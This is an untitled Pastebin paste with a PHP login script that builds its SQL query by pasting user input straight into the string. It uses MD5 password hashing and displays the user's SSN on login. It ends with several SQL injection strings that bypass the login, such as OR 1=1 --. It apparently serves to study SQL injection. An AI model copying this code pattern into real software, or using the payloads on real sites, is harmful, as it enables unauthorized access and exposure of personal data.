Guest User

Untitled

a guest
Apr 13th, 2018
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.07 KB | None | 0 0
  1. <form method="post" action="login.php">
  2.  
  3. $connect = mysqli_connect($dbhost, $dbuser, $dbpass) or die("Unable to connect to '$dbhost'");
  4. mysqli_select_db($connect,$dbname) or die("Could not open the database '$dbname'");
  5.  
  6. $message="";
  7. $username = $_POST["uname"];
  8. $pass_raw = $_POST["password"];
  9. $password = md5($pass_raw);
  10.  
  11. $result = mysqli_query($connect,"SELECT * FROM students WHERE uname='" . $username . "' and password = '". $password."'");
  12. $row = mysqli_fetch_array($result);
  13.  
  14. if(is_array($row)) {
  15. echo "Congratulations! you have logged in!";
  16. printf("Your First Name %s and Last Name is %s", $row[3], $row[4]);
  17. printf("Your SSN is %s ", $row[5]);
  18. } else {
  19. $message = "Invalid Username or Password!";
  20. echo "invalid user ";
  21. }
  22.  
  23. SELECT * FROM students WHERE uname='' OR '' = '' AND password = '$password'
  24.  
  25. SELECT * FROM students WHERE uname='' OR ('' = '' AND password = '$password')
  26.  
  27. SELECT * FROM students WHERE uname='' OR uname='admin' --' AND password = '$password'
  28. SELECT * FROM students WHERE uname='' OR 1=1 --' AND password = '$password'
Add Comment
Please, Sign In to add comment